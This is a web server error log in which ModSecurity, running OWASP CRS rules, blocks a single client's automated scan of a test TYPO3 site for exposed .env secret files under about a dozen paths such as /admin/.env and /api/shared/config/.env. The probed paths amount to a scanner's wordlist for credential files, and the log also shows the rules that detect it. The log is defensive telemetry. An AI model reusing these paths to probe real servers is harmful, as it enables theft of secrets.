[Wed Feb 19 06:29:49.029787 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "Z7VsTcO0jkjfdQXx8it8CAAAAAg"]
[Wed Feb 19 06:29:49.056020 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "Z7VsTcO0jkjfdQXx8it8CQAAAAg"]
[Wed Feb 19 06:29:49.056406 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "Z7VsTcO0jkjfdQXx8it8CQAAAAg"]
[Wed Feb 19 06:29:49.056852 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "Z7VsTcO0jkjfdQXx8it8CQAAAAg"]
[Wed Feb 19 06:29:49.083332 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z7VsTcO0jkjfdQXx8it8CgAAAAg"]
[Wed Feb 19 06:29:49.083706 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z7VsTcO0jkjfdQXx8it8CgAAAAg"]
[Wed Feb 19 06:29:49.084153 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z7VsTcO0jkjfdQXx8it8CgAAAAg"]
[Wed Feb 19 06:29:49.110345 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "Z7VsTcO0jkjfdQXx8it8CwAAAAg"]
[Wed Feb 19 06:29:49.110734 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "Z7VsTcO0jkjfdQXx8it8CwAAAAg"]
[Wed Feb 19 06:29:49.111168 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "Z7VsTcO0jkjfdQXx8it8CwAAAAg"]
[Wed Feb 19 06:29:49.137367 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z7VsTcO0jkjfdQXx8it8DAAAAAg"]
[Wed Feb 19 06:29:49.137737 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z7VsTcO0jkjfdQXx8it8DAAAAAg"]
[Wed Feb 19 06:29:49.138208 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z7VsTcO0jkjfdQXx8it8DAAAAAg"]
[Wed Feb 19 06:29:49.164527 2025] [authz_core:error] [pid 1259203] [client 193.41.206.36:39358] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.dist
[Wed Feb 19 06:29:49.191977 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /content/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/content/.env"] [unique_id "Z7VsTcO0jkjfdQXx8it8DgAAAAg"]
[Wed Feb 19 06:29:49.192365 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/content/.env"] [unique_id "Z7VsTcO0jkjfdQXx8it8DgAAAAg"]
[Wed Feb 19 06:29:49.192822 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/content/.env"] [unique_id "Z7VsTcO0jkjfdQXx8it8DgAAAAg"]
[Wed Feb 19 06:29:49.218052 2025] [authz_core:error] [pid 1259203] [client 193.41.206.36:39358] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Wed Feb 19 06:29:49.247172 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lara/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/Lara/.env"] [unique_id "Z7VsTcO0jkjfdQXx8it8EAAAAAg"]
[Wed Feb 19 06:29:49.247574 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/Lara/.env"] [unique_id "Z7VsTcO0jkjfdQXx8it8EAAAAAg"]
[Wed Feb 19 06:29:49.248041 2025] [:error] [pid 1259203] [client 193.41.206.36:39358] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/Lara/.env"] [unique_id "Z7VsTcO0jkjfdQXx8it8EAAAAAg"]
[Wed Feb 19 06:29:49.567486 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "Z7VsTQzqEFiMFYV11ByxCgAAAAM"]
[Wed Feb 19 06:29:49.567878 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "Z7VsTQzqEFiMFYV11ByxCgAAAAM"]
[Wed Feb 19 06:29:49.568341 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "Z7VsTQzqEFiMFYV11ByxCgAAAAM"]
[Wed Feb 19 06:29:49.594623 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "Z7VsTQzqEFiMFYV11ByxCwAAAAM"]
[Wed Feb 19 06:29:49.595048 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "Z7VsTQzqEFiMFYV11ByxCwAAAAM"]
[Wed Feb 19 06:29:49.595491 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "Z7VsTQzqEFiMFYV11ByxCwAAAAM"]
[Wed Feb 19 06:29:49.622994 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env"] [unique_id "Z7VsTQzqEFiMFYV11ByxDAAAAAM"]
[Wed Feb 19 06:29:49.623387 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env"] [unique_id "Z7VsTQzqEFiMFYV11ByxDAAAAAM"]
[Wed Feb 19 06:29:49.623837 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/staging/.env"] [unique_id "Z7VsTQzqEFiMFYV11ByxDAAAAAM"]
[Wed Feb 19 06:29:49.649958 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env"] [unique_id "Z7VsTQzqEFiMFYV11ByxDQAAAAM"]
[Wed Feb 19 06:29:49.650440 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env"] [unique_id "Z7VsTQzqEFiMFYV11ByxDQAAAAM"]
[Wed Feb 19 06:29:49.650865 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env"] [unique_id "Z7VsTQzqEFiMFYV11ByxDQAAAAM"]
[Wed Feb 19 06:29:49.677494 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "Z7VsTQzqEFiMFYV11ByxDgAAAAM"]
[Wed Feb 19 06:29:49.677935 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "Z7VsTQzqEFiMFYV11ByxDgAAAAM"]
[Wed Feb 19 06:29:49.679010 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "Z7VsTQzqEFiMFYV11ByxDgAAAAM"]
[Wed Feb 19 06:29:49.720809 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Z7VsTQzqEFiMFYV11ByxDwAAAAM"]
[Wed Feb 19 06:29:49.721224 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Z7VsTQzqEFiMFYV11ByxDwAAAAM"]
[Wed Feb 19 06:29:49.721663 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Z7VsTQzqEFiMFYV11ByxDwAAAAM"]
[Wed Feb 19 06:29:49.748884 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "Z7VsTQzqEFiMFYV11ByxEAAAAAM"]
[Wed Feb 19 06:29:49.749285 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "Z7VsTQzqEFiMFYV11ByxEAAAAAM"]
[Wed Feb 19 06:29:49.749736 2025] [:error] [pid 1258388] [client 193.41.206.36:42766] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "Z7VsTQzqEFiMFYV11ByxEAAAAAM"]
